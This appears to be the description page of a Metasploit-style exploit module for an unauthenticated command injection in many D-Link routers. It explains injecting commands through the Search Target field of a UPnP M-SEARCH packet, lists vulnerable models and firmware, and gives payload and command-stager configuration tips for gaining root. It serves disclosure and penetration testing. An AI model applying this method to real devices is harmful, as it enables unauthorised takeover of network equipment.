D-Link Unauthenticated Remote Command Execution using UPnP via a special crafted M-SEARCH packet.

Description

A command injection vulnerability exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900. An attacker can perform a remote command execution by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet. After successful exploitation, an attacker will have full access with `root` user privileges. NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target. Some D-Link devices do not have the `wget` command so configure `echo` as flavor with the command set CMDSTAGER::FLAVOR echo. The following D-Link network products and firmware are vulnerable: - D-Link Router model GO-RT-AC750 revisions Ax with firmware v1.01 or older; - D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older; - D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older; - D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older; - D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older; - D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older; - D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older; - D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older; - D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older; - D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older; - D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older; - D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older; - D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older; - D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older; - D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older; - D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older; - D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older; - D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older; - D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older; - D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older; - D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older; - D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older; - D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older; - D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older; - D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older; - probably more looking at the scale of impacted devices :-(

Author(s)

• h00die-gr3y <h00die.gr3y@gmail.com>
• Zach Cutlip
• Michael Messner <devnull@s3cur1ty.de>
• Miguel Mendez Z. (s1kr10s)
• Pablo Pollanco (secenv)
• Naihsin https://github.com/naihsin

Platform

Linux,Unix

Architectures

cmd, mipsle, mipsbe, armle